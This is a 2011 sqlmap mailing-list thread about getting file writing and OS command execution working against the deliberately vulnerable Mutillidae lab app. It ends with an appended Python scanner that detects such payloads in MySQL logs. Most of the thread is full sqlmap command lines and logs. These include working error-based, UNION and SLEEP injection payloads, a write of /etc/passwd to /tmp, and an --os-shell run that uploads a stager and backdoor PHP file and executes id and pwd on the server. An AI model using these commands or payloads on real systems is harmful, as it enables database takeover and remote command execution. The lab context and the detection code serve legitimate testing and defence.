Hi Chris,

No worries.
If you want command execution, sqlmap can handle it automatically also
when it's MySQL and you've got a writable folder within the document
root, --os-cmd and --os-shell. Also, --os-pwn can work in this
scenario too.
The file stager uploaded is 0KB because you provide invalid values to
the POST parameters. sqlmap uses the LIMIT 1 INTO OUTFILE trick to
upload the file stager against MySQL.

See:
--8<--
$ python sqlmap.py -u
"http://debian32/mutillidae/index.php?page=user-info.php" --data
"view_user_name=admin&password=adminpass&Submit_button=Submit" -v 1
--os-shell --flush-session

    sqlmap/1.0-dev (r4217) - automatic SQL injection and database takeover tool
    http://sqlmap.sourceforge.net

[!] legal disclaimer: usage of sqlmap for attacking targets without
prior mutual consent is illegal. It is the end user's responsibility
to obey all applicable local, state and federal laws. Authors assume
no liability and are not responsible for any misuse or damage caused
by this program

[*] starting at 23:49:52

[23:49:52] [INFO] setting file for logging HTTP traffic
[23:49:52] [INFO] using
'/home/bernardo/software/sqlmap/subversion/trunk/sqlmap/output/debian32/session'
as session file
[23:49:52] [INFO] flushing session file
[23:49:52] [INFO] testing connection to the target url
[23:49:52] [INFO] heuristics detected web page charset 'ascii'
[23:49:52] [INFO] testing if the url is stable, wait a few seconds
[23:49:53] [INFO] url is stable
[23:49:53] [INFO] testing if POST parameter 'view_user_name' is dynamic
[23:49:53] [WARNING] POST parameter 'view_user_name' appears to be not dynamic
[23:49:53] [INFO] heuristic test shows that POST parameter
'view_user_name' might be injectable (possible DBMS: MySQL)
[23:49:53] [INFO] testing sql injection on POST parameter 'view_user_name'
[23:49:53] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'
[23:49:54] [INFO] testing 'MySQL >= 5.0 AND error-based - WHERE or
HAVING clause'
[23:49:54] [INFO] POST parameter 'view_user_name' is 'MySQL >= 5.0 AND
error-based - WHERE or HAVING clause' injectable
[23:49:54] [INFO] testing 'MySQL > 5.0.11 stacked queries'
[23:49:54] [INFO] testing 'MySQL > 5.0.11 AND time-based blind'
[23:50:04] [INFO] POST parameter 'view_user_name' is 'MySQL > 5.0.11
AND time-based blind' injectable
[23:50:04] [INFO] testing 'MySQL UNION query (NULL) - 1 to 10 columns'
[23:50:04] [INFO] target url appears to be UNION injectable with 4 columns
[23:50:04] [INFO] POST parameter 'view_user_name' is 'MySQL UNION
query (NULL) - 1 to 10 columns' injectable
POST parameter 'view_user_name' is vulnerable. Do you want to keep
testing the others? [y/N]
sqlmap identified the following injection points with a total of 30
HTTP(s) requests:
---
Place: POST
Parameter: view_user_name
    Type: error-based
    Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
    Payload: view_user_name=admin' AND (SELECT 3033 FROM(SELECT
COUNT(*),CONCAT(CHAR(58,108,114,100,58),(SELECT (CASE WHEN (3033=3033)
THEN 1 ELSE 0 END)),CHAR(58,116,116,115,58),FLOOR(RAND(0)*2))x FROM
INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND
'ekpw'='ekpw&password=adminpass&Submit_button=Submit

    Type: UNION query
    Title: MySQL UNION query (NULL) - 1 to 10 columns
    Payload: view_user_name=admin' UNION ALL SELECT NULL, NULL,
CONCAT(CHAR(58,108,114,100,58),IFNULL(CAST(CHAR(67,69,82,68,112,104,67,118,70,113)
AS CHAR),CHAR(32)),CHAR(58,116,116,115,58)), NULL# AND
'TOwv'='TOwv&password=adminpass&Submit_button=Submit

    Type: AND/OR time-based blind
    Title: MySQL > 5.0.11 AND time-based blind
    Payload: view_user_name=admin' AND SLEEP(5) AND
'BfoH'='BfoH&password=adminpass&Submit_button=Submit
---

[23:51:31] [INFO] the back-end DBMS is MySQL

web application technology: PHP 5.2.6, Apache 2.2.9
back-end DBMS: MySQL 5.0
[23:51:31] [INFO] going to use a web backdoor for command prompt
[23:51:31] [INFO] fingerprinting the back-end DBMS operating system
[23:51:31] [INFO] the back-end DBMS operating system is Linux
[23:51:31] [INFO] trying to upload the file stager
which web application language does the web server support?
[1] ASP
[2] ASPX
[3] PHP (default)
[4] JSP
>
[23:51:32] [WARNING] unable to retrieve the web server document root
please provide the web server document root [/var/www/]:
[23:51:32] [WARNING] unable to retrieve any web server path
please provide any additional web server full path to try to upload
the agent [Enter for None]: /var/www/test
[23:51:35] [WARNING] unable to upload the file stager on '/var/www'
[23:51:35] [INFO] the file stager has been successfully uploaded on
'/var/www/test' - http://debian32:80/test/tmpugbmo.php
[23:51:35] [INFO] the backdoor has probably been successfully uploaded
on '/var/www/test' - http://debian32:80/test/tmpbnhpd.php
[23:51:35] [INFO] calling OS shell. To quit type 'x' or 'q' and press ENTER
os-shell> id
do you want to retrieve the command standard output? [Y/n/a]
command standard output:    'uid=33(www-data) gid=33(www-data)
groups=33(www-data)'

os-shell> pwd
do you want to retrieve the command standard output? [Y/n/a]
command standard output:    '/var/www/test'

os-shell> exit
[23:51:44] [WARNING] HTTP error codes detected during testing:
404 (Not Found) - 1 times
[23:51:44] [INFO] Fetched data logged to text files under
'/home/bernardo/software/sqlmap/subversion/trunk/sqlmap/output/debian32'

[*] shutting down at 23:51:44
--8<--

Cheers,
Bernardo


On 6 July 2011 23:46,  <christopher.oak...@gmail.com> wrote:
> Hi
>
> Thanks. It turns out I was being an idiot. With absolute paths I didn't 
> realise that this also includes the destination file name. With that 
> included, it works like a dream.
>
> What I haven't managed to get going properly yet is the --os-cmd flag. The 
> temp stager file does appear, but is empty, 0KB. However; I think I'll save 
> that one for another day!
>
> Regards
>
> Chris
> ------------------
>
> -----Original Message-----
> From: "Bernardo Damele A. G." <bernardo.dam...@gmail.com>
> Date: Wed, 6 Jul 2011 23:42:22
> To: Chris Oakley<christopher.oak...@gmail.com>
> Cc: <sqlmap-users@lists.sourceforge.net>
> Subject: Re: [sqlmap-users] File Writing
>
> Hi Chris,
>
> To me it works well:
> --8<--
> $ python sqlmap.py -u
> "http://debian32/mutillidae/index.php?page=user-info.php" --forms -p
> view_user_name --risk 3 --level 3 --parse-errors --file-write
> /etc/passwd --file-dest /tmp/test --flush-session
>
>    sqlmap/1.0-dev (r4217) - automatic SQL injection and database takeover tool
>    http://sqlmap.sourceforge.net
>
> [!] legal disclaimer: usage of sqlmap for attacking targets without
> prior mutual consent is illegal. It is the end user's responsibility
> to obey all applicable local, state and federal laws. Authors assume
> no liability and are not responsible for any misuse or damage caused
> by this program
>
> [*] starting at 23:26:35
>
> [23:26:35] [INFO] setting file for logging HTTP traffic
> [23:26:35] [INFO] testing connection to the target url
> [23:26:35] [INFO] heuristics detected web page charset 'ascii'
> [23:26:35] [INFO] searching for forms
> [#1] form:
> POST http://debian32:80/mutillidae/index.php?page=user-info.php
> POST data: view_user_name=&password=&Submit_button=Submit
> do you want to test this form? [Y/n/q]
> >
> Edit POST data [default:
> view_user_name=&password=&Submit_button=Submit] (Warning: blank fields
> detected):
> do you want to fill blank fields with random values? [Y/n]
> [23:26:37] [WARNING] the testable parameter 'view_user_name' you
> provided is not inside the GET
> [23:26:37] [INFO] using
> '/home/bernardo/software/sqlmap/subversion/trunk/sqlmap/output/debian32/session'
> as session file
> [23:26:37] [INFO] flushing session file
> [23:26:37] [INFO] using
> '/home/bernardo/software/sqlmap/subversion/trunk/sqlmap/output/results-07062011_1126pm.csv'
> as results file
> [23:26:37] [INFO] heuristics detected web page charset 'ascii'
> [23:26:37] [INFO] testing if the url is stable, wait a few seconds
> [23:26:38] [INFO] url is stable
> [23:26:38] [INFO] heuristic test shows that POST parameter
> 'view_user_name' might be injectable (possible DBMS: MySQL)
> [23:26:38] [INFO] testing sql injection on POST parameter 'view_user_name'
> [23:26:38] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'
> [23:26:40] [INFO] testing 'OR boolean-based blind - WHERE or HAVING clause'
> [23:26:42] [INFO] testing 'OR boolean-based blind - WHERE or HAVING
> clause (Generic comment)'
> [23:26:42] [INFO] POST parameter 'view_user_name' is 'OR boolean-based
> blind - WHERE or HAVING clause (Generic comment)' injectable
> [23:26:42] [INFO] testing 'MySQL >= 5.0 AND error-based - WHERE or
> HAVING clause'
> [23:26:42] [INFO] testing 'MySQL >= 4.1 AND error-based - WHERE or
> HAVING clause'
> [23:26:42] [INFO] testing 'MySQL >= 5.0 OR error-based - WHERE or HAVING 
> clause'
> [23:26:42] [INFO] testing 'MySQL >= 4.1 OR error-based - WHERE or HAVING 
> clause'
> [23:26:42] [INFO] testing 'MySQL OR error-based - WHERE or HAVING clause'
> [23:26:42] [INFO] POST parameter 'view_user_name' is 'MySQL OR
> error-based - WHERE or HAVING clause' injectable
> [23:26:42] [INFO] testing 'MySQL > 5.0.11 stacked queries'
> [23:26:42] [INFO] testing 'MySQL < 5.0.12 stacked queries (heavy query)'
> [23:26:42] [INFO] testing 'MySQL > 5.0.11 AND time-based blind'
> [23:26:42] [INFO] testing 'MySQL < 5.0.12 AND time-based blind (heavy query)'
> [23:26:42] [INFO] testing 'MySQL > 5.0.11 OR time-based blind'
> [23:26:42] [INFO] testing 'MySQL UNION query (NULL) - 1 to 10 columns'
> [23:26:43] [INFO] target url appears to be UNION injectable with 4 columns
> [23:26:43] [INFO] POST parameter 'view_user_name' is 'MySQL UNION
> query (NULL) - 1 to 10 columns' injectable
> [23:26:43] [WARNING] in OR boolean-based injections, please consider
> usage of switch --drop-set-cookie if you experience any problems
> during data retrieval
> POST parameter 'view_user_name' is vulnerable. Do you want to keep
> testing the others? [y/N]
> sqlmap identified the following injection points with a total of 148
> HTTP(s) requests:
> ---
> Place: POST
> Parameter: view_user_name
>    Type: boolean-based blind
>    Title: OR boolean-based blind - WHERE or HAVING clause (Generic comment)
>    Payload: view_user_name=-5244' OR NOT (1884=1884)--
> &password=bDXj&Submit_button=Submit
>
>    Type: error-based
>    Title: MySQL OR error-based - WHERE or HAVING clause
>    Payload: view_user_name=-3024' OR 1 GROUP BY
> CONCAT(CHAR(58,97,108,119,58),(SELECT (CASE WHEN (8877=8877) THEN 1
> ELSE 0 END)),CHAR(58,112,119,98,58),FLOOR(RAND(0)*2)) HAVING MIN(0)--
> &password=bDXj&Submit_button=Submit
>
>    Type: UNION query
>    Title: MySQL UNION query (NULL) - 1 to 10 columns
>    Payload: view_user_name=IZBb' UNION ALL SELECT NULL,
> CONCAT(CHAR(58,97,108,119,58),IFNULL(CAST(CHAR(121,74,77,117,83,105,112,118,99,84)
> AS CHAR),CHAR(32)),CHAR(58,112,119,98,58)), NULL,
> NULL#&password=bDXj&Submit_button=Submit
> ---
>
> do you want to exploit this SQL injection? [Y/n]
> [23:26:46] [INFO] testing MySQL
> [23:26:46] [INFO] confirming MySQL
> [23:26:46] [INFO] the back-end DBMS is MySQL
>
> web application technology: PHP 5.2.6, Apache 2.2.9
> back-end DBMS: MySQL >= 5.0.0
> [23:26:46] [INFO] fingerprinting the back-end DBMS operating system
> [23:26:46] [INFO] the back-end DBMS operating system is Linux
> [23:26:46] [WARNING] if the problem persists with 'None' values please
> try to use hidden switch --no-cast (fixing problems with some
> collation issues)
> do you want confirmation that the file '/tmp/test' has been
> successfully written on the back-end DBMS file system? [Y/n]
> [23:26:48] [INFO] the file has been successfully written and its size
> is 1848 bytes, but the size differs from the local file '/etc/passwd'
> (1845 bytes)
> [23:26:48] [WARNING] expect junk characters inside the file as a
> leftover from UNION query
> [23:26:48] [INFO] you can find results of scanning in multiple targets
> mode inside the CSV file
> '/home/bernardo/software/sqlmap/subversion/trunk/sqlmap/output/results-07062011_1126pm.csv'
>
> [*] shutting down at 23:26:48
> --8<--
>
> Cheers,
> Bernardo
>
>
> On 3 July 2011 18:03, Chris Oakley <christopher.oak...@gmail.com> wrote:
>> Hi
>>
>> I'm playing with file writing.  I have a full privs root user set up in
>> mysql and am using
>> http://www.irongeek.com/i.php?page=security/mutillidae-deliberately-vulnerable-php-owasp-top-10
>> to play with.  I've set up a /temp folder below the web root of the app.
>> I've put a file "evil.php" in the sqlmap working directory.  I've also
>> changed the permissions for all users on the temp folder to write access
>> allowed.
>>
>> I'm using the following input to try and upload this file:
>>
>> C:\Program Files\sqlmap-0.9>python sqlmap.py -u
>> "http://localhost/mutillidae/index.php?page=user-info.php" --data
>> "username=&password=&user-info-php-submit-button=View+Account+Details"
>> -p "username" --proxy "http://127.0.0.1:8085" --file-write "evil.php"
>> --file-dest "temp/evil.php"
>>
>> This is with the latest dev build by the way.
>>
>> The output I get is:
>>
>> [18:00:03] [INFO] the back-end DBMS is MySQL
>> web server operating system: Windows
>> web application technology: PHP 5.3.5, Apache 2.2.17
>> back-end DBMS: MySQL 5.0
>> [18:00:03] [INFO] fingerprinting the back-end DBMS operating system
>> [18:00:03] [INFO] the back-end DBMS operating system is Windows
>> [18:00:04] [WARNING] if the problem persists with 'None' values please try
>> to use hidden switch --no-cast (fixing problems with some collation issues)
>> do you want confirmation that the file 'temp/evil.php' has been successfully
>> written on the back-end DBMS file system? [Y/n]
>> [18:00:12] [WARNING] it looks like the file has not been written, this can
>> occur if the DBMS process' user has no write privileges in the destination path
>> [18:00:12] [WARNING] expect junk characters inside the file as a leftover
>> from UNION query
>> [18:00:12] [INFO] Fetched data logged to text files under 'C:\Program
>> Files\sqlmap-0.9\output\localhost'
>>
>> [*] shutting down at 18:00:12
>>
>> and sure enough the file isn't written.  I've also tried using the --no-cast
>> switch, to no avail.
>>
>> Does anyone have any ideas on what could be going wrong here?  I can use the
>> --file-read switch to read any file such as C:\boot.ini.  The --os-cmd and
>> --os-pwn commands also fail at the stager upload phase, probably for similar
>> reasons.
>>
>> Any help would be appreciated
>>
>> Cheers
>>
>> Chris
>>
>>
>> _______________________________________________
>> sqlmap-users mailing list
>> sqlmap-users@lists.sourceforge.net
>> https://lists.sourceforge.net/lists/listinfo/sqlmap-users
>>
>>
>
>
>
> --
> Bernardo Damele A. G.
>
> E-mail / Jabber: bernardo.damele (at) gmail.com
> Mobile: +447788962949 (UK 07788962949)
> PGP Key ID: Unavailable
>



-- 
Bernardo Damele A. G.

E-mail / Jabber: bernardo.damele (at) gmail.com
Mobile: +447788962949 (UK 07788962949)
PGP Key ID: Unavailable
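The thread turns on what sqlmap's payloads look like once they reach MySQL (UNION queries wrapping data in CHAR() marker strings, SLEEP() for time-based checks, and the LIMIT 1 INTO OUTFILE write used to drop the file stager). As an added example, not code from sqlmap or from anyone in this thread, here is a small defender-side scanner over constructed MySQL general-log lines that flags those query shapes and decodes the CHAR() sequences so the markers are readable. The log lines, the table name and the signature names are assumptions made for the example.

```python
import re

# Constructed MySQL general-log style lines (sample input built for this
# example, not taken from the thread). Line 2 reuses the shape of the UNION
# payload reported above; line 3 is a SELECT ... LIMIT 1 INTO OUTFILE write.
SAMPLE_LOG = """\
Query\tSELECT * FROM accounts WHERE username='admin' AND password='adminpass'
Query\tSELECT * FROM accounts WHERE username='admin' UNION ALL SELECT NULL, NULL, CONCAT(CHAR(58,108,114,100,58),IFNULL(CAST(CHAR(67,69,82,68,112,104,67,118,70,113) AS CHAR),CHAR(32)),CHAR(58,116,116,115,58)), NULL#' AND password='x'
Query\tSELECT * FROM accounts WHERE username='admin' LIMIT 1 INTO OUTFILE '/var/www/test/tmpugbmo.php'
Query\tSELECT * FROM accounts WHERE username='admin' AND SLEEP(5) AND 'BfoH'='BfoH'
"""

CHAR_CALL = re.compile(r"CHAR\(\s*(\d+(?:\s*,\s*\d+)*)\s*\)", re.IGNORECASE)

# Heuristics named after the injection types in the sqlmap report above.
SIGNATURES = {
    "file_write": re.compile(r"\bINTO\s+(OUTFILE|DUMPFILE)\b", re.IGNORECASE),
    "union_query": re.compile(r"\bUNION\s+(ALL\s+)?SELECT\b", re.IGNORECASE),
    "error_based": re.compile(r"FLOOR\(RAND\(0\)\*2\)", re.IGNORECASE),
    "time_based": re.compile(r"\b(SLEEP|BENCHMARK)\s*\(", re.IGNORECASE),
}


def decode_char_calls(sql):
    """Rewrite CHAR(58,108,...) calls as quoted ASCII so the marker strings
    wrapped around extracted data (e.g. ':lrd:' ... ':tts:') become readable."""
    def repl(m):
        codes = [int(c) for c in m.group(1).split(",")]
        return "'" + "".join(chr(c) for c in codes) + "'"
    return CHAR_CALL.sub(repl, sql)


def classify(sql):
    """Return the sorted list of signature names matching one query."""
    return sorted(name for name, rx in SIGNATURES.items() if rx.search(sql))


def scan(log_text):
    """Return (line_no, findings, decoded_query) for every suspicious line."""
    hits = []
    for no, line in enumerate(log_text.splitlines(), 1):
        findings = classify(line)
        if findings:
            hits.append((no, findings, decode_char_calls(line)))
    return hits


if __name__ == "__main__":
    for no, findings, decoded in scan(SAMPLE_LOG):
        print(f"line {no}: {', '.join(findings)}\n  {decoded}")
```

On the configuration side, MySQL's secure_file_priv setting is the control that confines or disables SELECT ... INTO OUTFILE, which is what the file stager upload relies on.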
